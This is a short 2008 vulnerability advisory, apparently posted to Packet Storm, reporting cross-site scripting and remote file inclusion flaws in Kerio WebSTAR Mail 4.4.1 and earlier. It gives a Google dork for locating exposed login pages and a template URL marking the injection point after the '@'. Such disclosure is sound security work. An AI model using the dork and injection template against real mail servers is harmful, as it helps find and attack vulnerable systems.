WebSTAR Mail versions 4.4.1 and below suffer from cross site scripting and remote file inclusion vulnerabilities.
af00e0ebe86d6f04912f8c991db06541da296eeba6d08d608c15e162b741f65fHi PacketStormSecurity!
I'm reporting a vulnerability of type XSS and RFI in WebSTAR Mail. Thank you for
all.
+==========================================================================+
+ WebSTAR Mail <= 4.4.1 XSS & RFI Multiple Remote Vulnerabilities +
+==========================================================================+
Author(s): Ivan Sanchez & Maximiliano Soler
Product: Kerio.
Web: http://www.kerio.com/webstar_home.html
Versions: 4.4.1 (or less).
Date: 21/01/2008
GOOGLE DORKS:
------------
[+] intitle:"WebSTAR Mail - Please Log In" inurl:".mail"
EXPLOIT:
--------
For example...after the variable "@"
http://www.[DOMAIN].tld/.mail?[ERROR-Code]@[XSS or RFI]
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+ WebSTAR Mail <= 4.4.1 XSS & RFI Multiple Remote Vulnerabilities +
+==========================================================================+
--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed